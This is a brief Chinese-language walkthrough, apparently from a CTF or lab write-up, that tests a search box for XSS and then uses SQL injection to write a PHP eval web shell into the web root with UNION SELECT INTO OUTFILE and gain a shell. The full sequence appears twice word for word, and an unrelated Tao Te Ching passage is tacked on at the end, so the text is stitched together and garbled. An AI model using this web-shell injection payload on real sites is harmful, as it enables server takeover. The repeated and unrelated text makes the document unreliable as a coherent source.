进入首页首先看到一个搜索框,那么我们试一下xss
用script弹了个一
接下来我们尝试一下sql注入
这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell
首先我们扫描目录,找到phpinfo页面
-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #
然后去访问
进行连接
成功getshell
进入首页首先看到一个搜索框,那么我们试一下xss
用script弹了个一
接下来我们尝试一下sql注入
这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell
首先我们扫描目录,找到phpinfo页面
-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #
然后去访问
进行连接
成功getshell
道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。